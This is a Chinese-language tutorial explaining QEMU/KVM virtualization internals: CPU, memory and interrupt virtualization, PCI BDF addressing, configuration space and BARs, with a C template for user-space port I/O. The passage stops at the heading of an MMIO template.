基础知识 QEMU 架构
QEMU 与 KVM 的完整架构整体上分为三大部分:
VMX root 模式的用户空间应用层 (QEMU 进程)
VMX root 模式的内核空间 (Linux KVM 驱动模块)
VMX non-root 模式的虚拟机运行环境 (Guest 虚拟机)
其中,VMX root 和 VMX non-root 是 CPU 支持硬件虚拟化指令集(Intel 的 VT-x 技术)之后引入的两个模式:
VMX root 模式 用于宿主机系统(即运行虚拟化软件的 Host),在该模式下可执行特权虚拟化指令,完整控制 CPU 虚拟化行为。
VMX non-root 模式 用于运行客户机(即 Guest OS),Guest 在 non-root 模式下正常运行,绝大部分指令可直接由物理 CPU 执行。特殊敏感操作会导致 CPU 从 non-root 模式退出到 root 模式(VM-Exit),交由 KVM/QEMU 处理。
无论 VMX root 还是 VMX non-root 模式,都包含 ring 0 到 ring 3 共 4 个特权级别。
QEMU 进程 在 QEMU 与 KVM 虚拟化架构中,QEMU 进程位于 VMX root 模式的用户空间,承担如下任务:
初始化虚拟机硬件环境 :
创建虚拟芯片组(如 PCI 主桥、内存控制器)
根据用户启动参数 (-device 等) 创建并初始化各类虚拟设备(如磁盘、网卡、显卡、输入设备)
分配并管理来宾(Guest)物理内存空间,QEMU 将 Guest 的物理内存映射到宿主机进程虚拟地址空间中(使用 mmap 等系统调用)。
设备模拟与 IO 请求处理 : 在虚拟机运行期间,QEMU 主线程会使用事件循环机制(main loop)监听并处理多种事件:
设备 IO 请求事件 :当虚拟机对虚拟设备发起 IO 请求(PIO/MMIO)并触发 VM-Exit 后,KVM 会通过 ioctl 接口通知 QEMU 处理这些事件。
管理命令事件 :如用户通过 QEMU 的管理界面或 QMP(QEMU Machine Protocol)发送的命令。
宿主机设备事件 :如网络数据接收或宿主设备状态变化(例如 tap 网络设备的数据包到达),QEMU 会做出响应并模拟设备行为。
对于虚拟机设备 IO 访问事件,QEMU 用户空间通过预先注册的 MemoryRegionOps 等设备模型回调函数完成 IO 请求处理,模拟真实硬件的行为(例如返回设备寄存器值、进行 DMA 操作、发起中断请求)。
CPU 线程管理 : QEMU 为每个虚拟 CPU (vCPU) 创建单独的宿主机线程,用于代表并调度虚拟机 CPU 的执行流。QEMU 借助 KVM 驱动控制 CPU 的虚拟化行为,使 vCPU 线程能够在宿主机的 CPU 上直接执行 Guest 代码。
虚拟机 (Guest) 环境 Guest OS 在 VMX non-root 模式下运行,有自己的应用层和内核层:
对 Guest OS 而言,QEMU 和 KVM 完全透明 ,不需要对 Guest OS 做任何修改,就可以在虚拟机中正常运行。
Guest 虚拟机的每个 vCPU 对应宿主机中 QEMU 进程的一个线程。通过 KVM 和宿主 OS 调度,这些线程能直接在物理 CPU 上执行 Guest 代码。
Guest 虚拟机内存通过两层映射实现地址转换:
GVA→GPA (Guest 虚拟地址 → Guest 物理地址):由虚拟机自身 OS 页表管理。
GPA→HPA (Guest 物理地址 → Host 物理地址):由 KVM 驱动维护的 Extended Page Tables (EPT) 或 Shadow 页表完成。
Guest OS 中的设备通过 QEMU 呈现,Guest OS 在启动时进行设备枚举并加载相应的设备驱动程序。
Guest OS 运行中,通过 IO 端口 (PIO) 或内存映射 IO (MMIO) 与设备进行交互时,KVM 会截获这些敏感操作(VM-Exit)并将请求分发至 QEMU 用户空间,由 QEMU 负责处理这些设备请求。
KVM 内核驱动 KVM 驱动位于 VMX root 模式的 Linux 内核空间,以 misc 设备驱动形式 (/dev/kvm) 存在,提供如下功能:
QEMU 虚拟化 CPU 虚拟化 vCPU 创建与初始化 QEMU 为每个 vCPU 启动一个线程,使用 /dev/kvm 的 ioctl 建立虚拟机/虚拟 CPU:KVM_CREATE_VM → KVM_CREATE_VCPU → mmap(KVM_RUN) → KVM_SET_REGS/SET_SREGS/SET_MSRS … 初始化完寄存器/CPUID/特性后进入主循环。
执行循环与 VM-Exit/Entry vCPU 线程反复 ioctl(KVM_RUN) 进入来宾(VM-Entry)。当发生敏感事件/条件 时硬件触发 VM-Exit 返回宿主: 典型原因:PIO、MMIO、CPUID/MSR 访问、HLT、外部中断窗口、EPT 缺页/权限、I/O 指令等。 KVM 将退出原因写入 struct kvm_run,QEMU读出后分发处理(设备回调、注入中断、继续运行等),随后再次 KVM_RUN(VM-Entry)。
简化伪码:
1 2 3 4 5 6 7 8 9 for (;;) { ioctl(vcpu_fd, KVM_RUN); switch (run->exit_reason) { case KVM_EXIT_MMIO: qemu_mmio_dispatch(run->mmio); break ; case KVM_EXIT_IO: qemu_pio_dispatch(run->io); break ; case KVM_EXIT_HLT: break ; } }
VMCS/VMCB Intel VT-x 使用 VMCS 保存每个 vCPU 的来宾/宿主状态(AMD SVM 对应 VMCB )。这不是“像系统调用那样的内核栈切换”,而是硬件虚拟化态切换 :VM-Entry/Exit 时由 CPU 在 VMCS/VMCB 与宿主状态之间来回装载。
内存虚拟化 1 2 3 4 5 6 Guest process Guest kernel QEMU (userspace) Host kernel (KVM) DRAM GVA ──►(guest PT)──► GPA ──►(EPT/NPT)──► HPA (HVA 仅用于用户态管理/拷贝) │ │ ▲ │ └─MMIO(未映射/设备型)───┘ ← VM-Exit → QEMU MemoryRegionOps 回调 │ └─IOVA(可选, 有vIOMMU时)──►(vIOMMU映射)──►GPA───►(EPT/NPT)──►HPA
内存地址类别
GVA(Guest Virtual Address) :来宾进程看到的虚拟地址,受来宾内核维护的页表(CR3 指向的页表根)管理。
GPA(Guest Physical Address) :来宾眼中的“物理地址”,由来宾内核分配/管理,实际上只是一个客户机物理地址空间 。
HVA(Host Virtual Address) :宿主机用户态(QEMU 进程)的虚拟地址,QEMU 用 mmap() 得到,用来承载来宾的“物理内存”数据 。
HPA(Host Physical Address) :宿主机真实物理地址。
真正跑指令的“硬件级地址翻译”,根本不认识 HVA 。
CPU 在来宾里做访存时,只走这条链路:
GVA(来宾虚拟) →【来宾页表】→ GPA(来宾物理) →【EPT/NPT(二级页表)】→ HPA(宿主物理)
HVA(Host Virtual Address)只是QEMU 这个用户态进程里的指针 ,给 QEMU/KVM 在“管理阶段/缺页处理/用户态拷贝”用的,不在硬件翻译链路里 。
内存结构初始化
QEMU 分配宿主用户态内存
通过 mmap()(或基于 hugetlbfs 的文件、匿名内存、memfd 等后端)在 QEMU 进程地址空间 中创建一段连续的 HVA 区域,作为“来宾物理内存”的承载。
QEMU 维护 MemoryRegion/AddressSpace
QEMU 的 Memory API 将 RAM 区域与 I/O 区域抽象成 MemoryRegion,并组合成来宾的 GPA 地址空间布局。
告知 KVM:内存槽(memslot)
QEMU 通过 KVM_SET_USER_MEMORY_REGION ioctl 把若干段 GPA 区间 与它们对应的 HVA 起始地址 与大小注册到 KVM,形成 memslot 。
一个 memslot 的关键信息包含:slot 编号、guest_phys_addr(GPA 起始)、memory_size、userspace_addr(HVA 起始)、flags(如脏页记录)。
memslot 数量有内核能力限制(KVM_CAP_NR_MEMSLOTS 暴露具体上限,一般为数百级 ),生产中通常合并为少量大区域,便于管理与迁移。
动态更新
QEMU 之后若调整内存布局(热插拔、I/O BAR 映射变化等),会再次调用 KVM_SET_USER_MEMORY_REGION 更新 memslot,KVM 以 SRCU 等机制保证并发安全。
内存地址转换 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 Guest' processes +--------------------+ Virtual addr space | | +--------------------+ | | \__ Page Table \__ \ \ | | Guest kernel +----+--------------------+----------------+ Guest's phy. memory | | | | +----+--------------------+----------------+ | | \__ \__ \ \ | QEMU process | +----+------------------------------------------+ Virtual addr space | | | +----+------------------------------------------+ | | \__ Page Table \__ \ \ | | +----+-----------------------------------------------++ Physical memory | | || +----+-----------------------------------------------++
来宾页表:GVA → GPA
由来宾 OS 自己维护(gCR3 指向的页表),机制与真机一致(4K/2M/1G 页、LA57、SMEP/SMAP 等)。
二级页表(硬件/KVM):GPA → HPA
Intel:EPT ,AMD:NPT 。支持 4K/2M/1G 二级页,通常选 Write-Back 内存类型。
当 GPA 首次触达或权限不满足时会发生 EPT/NPT violation (或缺页),触发 VM-Exit ,KVM/内核再建立/修正映射后重新进入来宾。
当来宾系统 执行一条内存访问指令 时,通常会有如下过程:
快路径:TLB 命中(硬件一步到位)
当同一地址最近访问过、TLB 里已经有“合成后的”条目时,CPU 在来宾里执行:GVA ──TLB命中──► HPA → 直接读/写 DRAM
这条 TLB 记录其实是“GVA→HPA 的组合结果”(包含了两段翻译的缓存),所以不需要再查页表,也不会 VM-Exit 。
HVA 完全没出现 ;硬件不认识它。
慢路径(第一次访问 / TLB 未命中)
TLB miss 时,硬件要做“两段式翻译”。注意:连“读来宾页表本身”的每一步,也要经过 EPT/NPT 。
来宾页表把 GVA → GPA (仍在 VMX non-root,硬件完成)
以 x86-64 四级页表为例(PML4→PDPT→PD→PT),硬件做:
读 gCR3 得到来宾页表根(一个 GPA );
依次读 PML4E、PDPTE、PDE、PTE——这些表项都存放在“来宾物理内存”里 ,所以每次读表项(用到 GPA)又会通过下一步 EPT 去取对应的 HPA ;
得到最终 GPA (或大页的 GPA)。
如果某一级表项 不存在/权限不符 ,CPU在来宾内部 触发 #PF(页错误) ,交给来宾内核处理(仍在 non-root,不会到 KVM,除非你特意设置拦截)。
二级页表把 GPA → HPA (需要则 VM-Exit)
硬件用 VMCS/VMCB 里的 EPTP/NPT 做二级翻译:
至此你能看到:硬件真正访存只到 HPA 。HVA 只在 KVM 建/改 EPT 的那一刻被用作“找到那个物理页”的线索 ,和 QEMU 用户态做 memcpy() 时当作普通指针使用。
外设虚拟化 QEMU 里外设虚拟化的目标是:让 Guest 看到“像真的”设备,并在功能、性能、可迁移性 之间取舍。控制面靠 PIO/MMIO ,数据面靠 DMA ;运行时遇到设备访问会 VM-Exit→QEMU(或快路径) 处理。
QEMU 外设虚拟化的实现方式主要有三种:
纯模拟(QEMU device model) :设备寄存器以 PIO/MMIO 暴露;每次访问 VM-exit → QEMU 回调处理。
准虚拟(virtio 家族) :以 virtqueue 共享环传数据,显著减少陷入;数据面可下沉到 vhost(内核) 或 vhost-user(外部进程,如 DPDK/SPDK/virtiofsd) ,或用 vDPA 由硬件/内核直接跑。
直通(VFIO,含 SR-IOV/VF) :设备直接给 VM,用 IOMMU 做 DMA 隔离,性能接近裸机;
中断虚拟化 中断控制器 中断控制器主要有两种:
Intel 8259(PIC) :传统单处理器时代的可编程中断控制器(通过 IRQ0–IRQ15)。
I/O APIC + LAPIC :SMP 时代的主流组合:
IOAPIC :芯片组侧把外设中断路由到 CPU 逻辑中断向量。
LAPIC :每个 vCPU 上的本地 APIC,负责接收/投递中断;x2APIC 模式用 MSR 代替 MMIO,访问更快、向量空间更大。
QEMU 支持既能用户态模拟 8259/IOAPIC/LAPIC,也能调用 KVM 的 in-kernel irqchip 在内核中模拟,以减少 VM-Exit。对应的命令行(x86):-machine kernel-irqchip=on|off|split
on:8259/IOAPIC/LAPIC 全部在内核模拟(性能最佳,推荐 )。
off:全部由 QEMU 用户态模拟(易调试,性能最低 )。
split:通常是 LAPIC 在内核、IOAPIC/PIC 在用户态 ,用于兼容/迁移场景(行为依平台/版本)。
中断类型 中断有三种类型的虚拟化:
类型
触发方式
经手的控制器
特性
适用
INTx
电平触发线(INTA~D),共享
IOAPIC → LAPIC (可能先过 PIC)
可能“黏线”,必须 EOI 撤线;易抖动
兼容保底
MSI
设备写一条内存消息 (MSI addr/data)
直达 LAPIC
向量少,已优于 INTx
老驱动/设备
MSI‑X
同 MSI,但每队列独立条目
直达 LAPIC
多向量 (队列一对一),最稳最快
强烈推荐 (网/块多队列)
INTx,且 kernel-irqchip=off(全在 QEMU,最慢)
Raise :QEMU 仿真设备调用 pci_set_irq(dev, level=1) 提出中断。
Route :QEMU 修改虚拟 IOAPIC 的重定向表(目标 vCPU、触发方式、向量)。
Deliver :QEMU 通过 KVM 的 ioctl 把中断注入到 vCPU(用户态切内核,再切到 vCPU)
EOI :来宾在 LAPIC 写 EOI → VM‑Exit 到 QEMU → QEMU 更新 LAPIC/IOAPIC 状态 → 再回到 vCPU。 ⇒ 每步都可能 VM‑Exit/用户态往返 → 性能最差 。
INTx,且 kernel-irqchip=on(全在内核,快很多)
Raise :
QEMU 仿真设备可以直接通过 irqfd 把一个 eventfd 绑到 GSI;设备一触发就把 eventfd 写 1。
KVM 内核 irqchip 收到 eventfd → 内核里 更新 IOAPIC/PIC 状态。
Route/Deliver :内核 查 IOAPIC 表,直接送到目标 vCPU/LAPIC。
EOI :来宾写 LAPIC EOI → 内核里 处理,不再退出到 QEMU。 ⇒ 无需 QEMU 参与 注入/EOI,延迟大幅降低 。 (没有 irqfd 时,QEMU 也可以用 KVM_IRQ_LINE 注入,但仍比全用户态快)
MSI‑X + irqfd(virtio/vhost/VFIO 常用,最快)
Raise :设备要发 MSI‑X,本质是一次写内存 到“APIC 目标地址 + 数据”。
仿真设备:QEMU可直接 kvm_irqchip_send_msi()(KVM_SIGNAL_MSI)。
vhost/VFIO :把每个中断向量绑定一个 irqfd (eventfd)。后端或硬件触发这个 eventfd。
Route/Deliver :KVM 内核根据 MSI 路由表 (GSI routing)直接把中断送达目标 vCPU 的 LAPIC,不退出 到 QEMU。
EOI :来宾 LAPIC EOI 在内核处理(若硬件有 APICv/PI,还能进一步减少退出)。 ⇒ 消息信号 + in‑kernel + irqfd :常见最优路径 。
PCI 设备 PCI(Peripheral Component Interconnect) 是一套“主机 ↔ 外设”的标准总线与软件模型。它经历了演进:
PCI(并行) → PCI-X (并行/服务器) → PCIe(PCI Express,串行点到点) 。
软件模型延续:都有配置空间(Configuration Space) 、BAR(Base Address Register) 、中断 、DMA 等概念;PCIe 只是物理与链路层 变了,并新增了很多能力(MSI-X、热插拔、错误报告、节能等)。
把主板想成一座城市:
CPU/Root Complex = 市政府
PCIe Root Port / 交换机(Switch) = 城市立交
各类设备(网卡、显卡、NVMe、FPGA…) = 公司大楼(Endpoint)
开机后,政府(Root Complex)把所有大楼“接上光纤”(链路训练 :速率/宽度握手),然后一栋栋盘点信息 (配置空间 ),分配门牌号 (BDF:Bus:Device.Function )和地盘 (BAR:一段可映射的地址 ),最后发工作许可(Bus Master )和电话分机(中断:MSI/MSI-X )。 之后:
设备要读写内存,就自己“DMA 去搬货”;
干完活,它打分机(MSI-X )通知 CPU;
CPU 的驱动接电话,继续分派任务。
这就是“PCI 设备”在机器里的日常。
典型的 PCIe 拓扑 :
1 2 3 CPU / Root Complex ├─ Root Port 0 ──[Switch]── NVMe(0000:65:00.0) └─ Root Port 1 ── GPU(0000:03:00.0)
每个功能都有个 BDF (域:总线:设备.功能),如 0000:65:00.0。
BDF/DBDF 编址 BDF/DBDF 编址格式 每个 PCI 设备通过一段 BB:DD.F 格式的数据编址来表示。BDF 是“枚举顺序 + 桥的划分”决定的,加/拔设备、换插槽、BIOS 升级、桥/Root Port 重新枚举,都可能改变 Bus 号甚至设备号。但同一机器同一拓扑下,BDF 通常稳定。
BDF :BB:DD.F
**Bus (BB,总线号)**:8 位 → 0..255(显示为 00..ff)
**Device (DD,设备号/插槽号)**:5 位 → 0..31(一个总线最多 32 个“设备号”)
**Function (F,功能号)**:3 位 → 0..7(同一设备号最多 8 个“功能”)
一个 PCI 设备(同一个 DD)最多有 8 个函数 (F=0..7),叫“多功能设备 ”:
典型例子:PCH(南桥)下面的 00:1f.0 LPC 、00:1f.2 SATA 、00:1f.3 SMBus … 它们共享同一个设备号 1f,功能号不同。
是否多功能由 Function 0 的 Header Type bit7 决定(1=多功能)。
驱动加载时按 Function 维度 匹配:每个 Function 都有独立的配置空间(Vendor/Device ID 也可能不同)。
DBDF :DDDD:BB:DD.F
**Domain/Segment (DDDD,域)**:16 位 → 0..FFFF(通常为 0000;多根 PCIe Root Complex、复杂 NUMA/加速卡/直通场景时可能 >0)
例如:
00:1f.2 = 总线 0、设备 31、功能 2;
0000:65:00.0 = 域 0 的 65:00.0。
lspci 默认可能省略 0000:,用 -D 可强制显示域:lspci -D -s 65:00.0。其它常用命令如下:
总是显示域号(Domain):
看树:
看驱动/模块:
BDF 与机器拓扑 PCIe 是“树形 ”拓扑:Root Complex → Root Port →(可选)Switch → Endpoint。用 lspci -t(或 -tv)可以看到设备树,比如:
1 2 3 4 -+-[0000:65]-+-00.0 (Root Port) | \-00.1 (Root Port) \-[0000:66]-+-00.0 (Switch Upstream) \-[0000:67]-00.0 (你的网卡 67:00.0)
这里 67:00.0 的 67 就是被上面的桥划给它的子总线号 。
每一级“桥” (PCI-to-PCIe Bridge/Switch Port)在枚举时会配置三组“总线号寄存器”:
Primary Bus (桥自己所在的上游总线)
Secondary Bus (桥下游第一个 子总线号)
Subordinate Bus (桥下游最大 子总线号)
枚举时,固件/OS 会:
给桥分配 Secondary/Subordinate 的总线号区间 ;
在该区间内为下挂的设备分配 **Device(0..31)**,并探测其 Function ;
因此 Bus 号取决于桥的划分 ,Device/Function 再在该 Bus 内唯一。
DBDF 到文件系统的对应 在 sysfs 和 procfs 各有一套接口来映射 PCI 设备,它们不是同一个目录 。
BDF 与配置空间访问 访问配置空间时,必须用 Bus/Device/Function/Offset 这四元组索引到目标 Function:
也就是说,BDF 既是“名字”,也是访问坐标 。Domain/Segment 由 ACPI MCFG 指定不同段的 ECAM 基址,不参与 单个 PCIe 事务的 Requester ID(后者只有 Bus/Device/Function)。
配置空间 配置空间”(Configuration Space) 本质上就是“设备芯片内部的一堆寄存器” ,用于枚举/识别/配置 设备。操作系统通过“配置访问通道”把读/写请求 送到设备,设备把这些寄存器的内容返回。
配置空间结构 传统 PCI 的配置空间大小为 256 B ;而 PCIe 在次基础上有额外的 4 KiB 扩展配置空间 ,配置空间结构如下:
标准头(前 64B) 常见字段:
Vendor ID / Device ID:识别厂商与设备;
Command(控制位):bit0 I/O Space、bit1 Memory Space、bit2 Bus Master(DMA 必须开)…
Status:错误/能力支持等状态位;
Class Code/Subclass/ProgIF:设备类别(网卡/存储/桥…);
Header Type:0=端点,1=桥,2=CardBus;
BAR0..BAR5 :最多 6 个基址寄存器(Endpoint 类型);
Capabilities Pointer:指向“能力链表 ”(PM、MSI、MSI-X、PCIe Cap…)。
PCIe 扩展能力 在 4 KiB 的扩展能力空间 链表里(例如 AER、ACS、ARI、SR-IOV、ATS/PRI/PASID、L1 Substates…)。
配置空间查看 通过 lspci 命令 -s 参数指定 BDF 地址就可以查看对应设备的配置空间信息:
上述信息本质上是通过 sysfs 文件系统的 PCI 设备接口下的 config 文件查看的:
1 sudo cat /sys/bus/pci/devices/0000:65:00.0/config | xxd
另外 procfs 文件系统的 PCI 设备接口也可以查看 配置空间:
1 sudo cat /proc/bus/pci/65/00.0 | xxd
BAR 寄存器 BAR(Base Address Register)= 基址寄存器 。
设备用它来声明“我需要一扇对外的地址窗口 ”(可以是 I/O 空间或内存空间),操作系统据此在系统的地址空间中为它划一块不冲突的地址段 ,再把基址写回 BAR。之后:
CPU 访问“基址 + 偏移 ”就能访问到设备寄存器/缓冲区(MMIO 或 PIO );
设备内部的地址译码(decoder)看到这段地址,会把事务路由到对应的寄存器/存储阵列。
不同类型的 PCI 设备的 BAR 寄存器数量是不同的:
BAR 寄存器结构
I/O BAR(端口 I/O,主要在 x86)
bit0=1 表示这是 I/O 空间 (PIO)BAR;
bits[31:2] 保存 端口基址 (低 2 位必须为 0,表示对齐);
Memory BAR(内存映射 I/O,MMIO)
查看 BAR 寄存器 通过 lspci 命令我们可以查看 BAR 寄存器的状态。
/sys/bus/pci/devices/0000:65:00.0/resource 是内核给这个 PCI 设备最终分配的所有“地址资源”的汇总表 。 它把“这个函数现在占了哪些地址段 ”一次性列出来:每行三列——起始地址、结束地址(包含)和标志位 。这些行主要来源于 BAR0..BAR5(以及可选的 Expansion ROM) 的分配结果;若该设备是桥 ,还会包含桥窗口(I/O window、non-prefetchable MEM window、prefetchable MEM window)等。
resource 的每一行格式为:
1 <start_phys_addr> <end_phys_addr> <flags>
resource0…resourceN :同目录下的 resource0、resource1… 是把每一行(尤其是 Memory BAR )单独“摊开”的节点:
Memory BAR 对应的 resourceX 可以 mmap (用户态调试常用),直接访问设备寄存器/窗口;
I/O BAR(端口 I/O) 的那几行不可 mmap (它不是内存),要用 in/out 指令。
通信方式 PIO(Port-I/O,端口 I/O) PIO 是在 x86 体系特有的“I/O 端口地址空间 ”(和内存地址空间分离,最多 64K 端口)。设备采用 PIO 通信方式需要满足:
设备的 I/O BAR (BAR 的最低位为 1)指示它使用 I/O 空间。
将 Command.bit0 = 1(I/O Space Enable) 后,访问 I/O 端口才有效。
/proc/ioports ⇒ “I/O 端口地址空间”的占用清单 这里列的是PIO 端口范围 ,通常是被驱动通过 request_region() 注册过的那部分(比如 0x3f8-0x3ff : serial、0xcf8-0xcff : PCI conf1)。没被注册的端口段可能不会显示。
Port-mapped I/O(x86 的“端口 I/O”)没有“物理内存地址” 这个概念,只有I/O 端口号 (port number,x86 上是 0–0xFFFF)。访问用 in/out 指令或 /dev/port,不能 mmap 到用户虚拟地址,也不会出现在 /proc/pagemap 里。
CPU 用 in/out 指令访问这些端口。
x86 的 IN/OUT 指令族采用 16 位端口号(I/O 地址空间 0..65535),数据宽度只有 8/16/32 位 (没有 64 位)。
inb/outb ⇒ 8 位(AL)
inw/outw ⇒ 16 位(AX)
inl/outl ⇒ 32 位(EAX,在 x86-64 也用 32 位形式)
指令只允许“累加器”作为数据寄存器:读入到 AL/AX/EAX,或从 AL/AX/EAX 写出;端口在 DX 或 8 位立即数。
端口号在 DX:in al, dx / in ax, dx / in eax, dx;out dx, al/ax/eax
端口号是 8 位立即数(零扩展成 16 位):in al, imm8 / out imm8, al(常用于固定小端口,如 0x60)
sys/io.h 提供相关函数封装:inb/inw/inl/outb/outw/outl(这些就是对 IN/OUT 的内联汇编封装)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 #include <sys/io.h> unsigned char inb (unsigned short port) ;unsigned char inb_p (unsigned short port) ;unsigned short inw (unsigned short port) ;unsigned short inw_p (unsigned short port) ;unsigned int inl (unsigned short port) ;unsigned int inl_p (unsigned short port) ;void outb (unsigned char value, unsigned short port) ;void outb_p (unsigned char value, unsigned short port) ;void outw (unsigned short value, unsigned short port) ;void outw_p (unsigned short value, unsigned short port) ;void outl (unsigned int value, unsigned short port) ;void outl_p (unsigned int value, unsigned short port) ;void insb (unsigned short port, void *addr, unsigned long count) ;void insw (unsigned short port, void *addr, unsigned long count) ;void insl (unsigned short port, void *addr, unsigned long count) ;void outsb (unsigned short port, const void *addr, unsigned long count) ;void outsw (unsigned short port, const void *addr, unsigned long count) ;void outsl (unsigned short port, const void *addr, unsigned long count) ;
在 Linux 下,用户态线程默认不能 执行 inb/outb/inw/outw/inl/outl 这类 I/O 指令。原因是 CPU 会检查调用线程有没有 I/O 端口访问权限;没有的话直接触发保护异常(程序崩掉)。
下面两个 api 都可以获取 I/O 访问权限,但是前提都需要 CAP_SYS_RAWIO 能力,即允许执行 ioperm/iopl 等原始 I/O 操作。
ioperm(base, len, 1) 给“当前线程”的 I/O 位图里打开 [base, base+len) 这段端口范围,因此你就能对这段端口执行 in/out。需要 CAP_SYS_RAWIO 能力或 root。ioperm 是按端口范围细粒度授权 的,现代内核支持到 65536 个端口。
iopl(3) 把“当前线程”的 I/O 特权级提到 3,相当于对所有端口 都有访问权。也需要 CAP_SYS_RAWIO。官方文档标注它已不推荐 ,比 ioperm 慢,主要为了老式 X 服务器遗留场景;而且在新内核(≥3.7)上它的继承行为与早期不同。
PIO 读写模板:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 #define _GNU_SOURCE #include <errno.h> #include <inttypes.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/io.h> #include <unistd.h> #define IORESOURCE_IO 0x00000100ULL typedef struct { uint16_t base; uint32_t size; uint16_t grant_base; uint32_t grant_len; bool have_ioperm; bool have_iopl; bool inited; } pio_ctx_t ; static pio_ctx_t g_pio = {0 };static int parse_io_bar (const char *bdf_or_path, int bar_idx, uint16_t *out_base, uint32_t *out_size) { char path[256 ]; if (strchr (bdf_or_path, '/' )) { snprintf (path, sizeof (path), "%s" , bdf_or_path); } else { snprintf (path, sizeof (path), "/sys/bus/pci/devices/%s/resource" , bdf_or_path); } FILE *fp = fopen(path, "r" ); if (!fp) return -1 ; int idx = 0 , chosen = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long start = 0 , end = 0 , flags = 0 ; if (sscanf (line, "%llx %llx %llx" , &start, &end, &flags) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(flags & IORESOURCE_IO)) { fclose(fp); errno = EINVAL; return -1 ; } if (end < start || start > 0xFFFF ULL) { fclose(fp); errno = ERANGE; return -1 ; } *out_base = (uint16_t )start; *out_size = (uint32_t )(end - start + 1 ); chosen = idx; break ; } } else { if (idx <= 5 && (flags & IORESOURCE_IO)) { if (end < start || start > 0xFFFF ULL) { fclose(fp); errno = ERANGE; return -1 ; } *out_base = (uint16_t )start; *out_size = (uint32_t )(end - start + 1 ); chosen = idx; break ; } } idx++; } fclose(fp); if (chosen < 0 ) { errno = ENOENT; return -1 ; } return 0 ; } static int acquire_io_priv (uint16_t base, uint32_t size, uint16_t *grant_base, uint32_t *grant_len, bool *have_ioperm, bool *have_iopl) { uint32_t len = size; if ((unsigned )base + len > 0x10000 u) len = 0x10000 u - base; if (len == 0 ) len = 1 ; if (ioperm(base, len, 1 ) == 0 ) { *grant_base = base; *grant_len = len; *have_ioperm = true ; *have_iopl = false ; return 0 ; } if (iopl(3 ) == 0 ) { *grant_base = 0 ; *grant_len = 0 ; *have_ioperm = false ; *have_iopl = true ; return 0 ; } return -1 ; } int pio_init (const char *bdf_or_path, int bar_idx) { if (g_pio.inited) { errno = EALREADY; return -1 ; } uint16_t base = 0 ; uint32_t size = 0 ; if (parse_io_bar(bdf_or_path, bar_idx, &base, &size) != 0 ) return -1 ; uint16_t gbase = 0 ; uint32_t glen = 0 ; bool have_perm = false , have_iopl = false ; if (acquire_io_priv(base, size, &gbase, &glen, &have_perm, &have_iopl) != 0 ) return -1 ; g_pio.base = base; g_pio.size = size; g_pio.grant_base = gbase; g_pio.grant_len = glen; g_pio.have_ioperm= have_perm; g_pio.have_iopl = have_iopl; g_pio.inited = true ; return 0 ; } void pio_fini (void ) { if (!g_pio.inited) return ; if (g_pio.have_ioperm) (void )ioperm(g_pio.grant_base, g_pio.grant_len, 0 ); if (g_pio.have_iopl) (void )iopl(0 ); memset (&g_pio, 0 , sizeof (g_pio)); } uint16_t pio_base (void ) { return g_pio.base; }uint32_t pio_size (void ) { return g_pio.size; }static inline int pio_port (uint32_t off, int width, uint16_t *port_out) { if (!g_pio.inited) { errno = EPERM; return -1 ; } if ((uint64_t )off + (uint64_t )width > g_pio.size) { errno = ERANGE; return -1 ; } uint32_t p = (uint32_t )g_pio.base + off; if (p > 0xFFFF u) { errno = ERANGE; return -1 ; } *port_out = (uint16_t )p; return 0 ; } uint8_t pio_read8 (uint32_t off) { uint16_t p; if (pio_port(off,1 ,&p)) return 0 ; return inb(p); }uint16_t pio_read16 (uint32_t off) { uint16_t p; if (pio_port(off,2 ,&p)) return 0 ; return inw(p); }uint32_t pio_read32 (uint32_t off) { uint16_t p; if (pio_port(off,4 ,&p)) return 0 ; return inl(p); }void pio_write8 (uint32_t off, uint8_t v) { uint16_t p; if (pio_port(off,1 ,&p)) return ; outb(v,p); }void pio_write16 (uint32_t off, uint16_t v) { uint16_t p; if (pio_port(off,2 ,&p)) return ; outw(v,p); }void pio_write32 (uint32_t off, uint32_t v) { uint16_t p; if (pio_port(off,4 ,&p)) return ; outl(v,p); }
使用示例:
1 2 3 4 5 6 7 8 9 10 11 int main () { if (pio_init("0000:00:04.0" , -1 ) != 0 ) { perror("pio_init" ); return 1 ; } printf ("PIO base=0x%04x size=0x%x\n" , pio_base(), pio_size()); uint32_t v = pio_read32(0x64 ); printf ("R32 @ +0x64 = 0x%08x\n" , v); pio_write32(0x64 , v | 1 ); pio_fini(); return 0 ; }
MMIO(Memory-Mapped I/O,内存映射 I/O) MMIO 指的是把设备的一段寄存器/门铃窗口“映射”到物理地址空间 (由 BAR 决定)。CPU 用普通的内存读写 指令访问这些地址,就等价于在读写设备寄存器。
设备在配置空间里有 BAR0..BAR5 。固件/OS 为 Memory BAR 分配一段对齐的物理地址,并把这个地址写回 BAR。
/proc/iomem ⇒ “物理内存地址空间”的全局地图 包含了MMIO 区 (设备的 memory BAR)、以及 System RAM、ACPI/固件、ROM、内核代码数据、主桥下行 window 等等。也就是:不止 MMIO,但所有 MMIO 都会在这里出现 。
对 设备 MMIO 的用户态映射 (通过 /sys/.../resourceN 或 /dev/mem + remap_pfn_range 建出来的 VM_IO | VM_PFNMAP VMA),/proc/self/pagemap 不会 给出有效 PFN,很多内核版本直接把 PFN 置 0(或把 present 位清掉),因此你对 g_mmio.bar 调 virt_to_phys() 会得到 0 → 打印成 (nil)。而匿名页是普通 RAM,所以能拿到 0x2e08000 这种正常的物理地址。
换句话说:pagemap 只适合“内存页(RAM)” ,不适合设备 I/O 映射 。MMIO 的“物理地址”应当由映射来源 来确定,而不是再去反查 pagemap。
MMIO 读写模板:
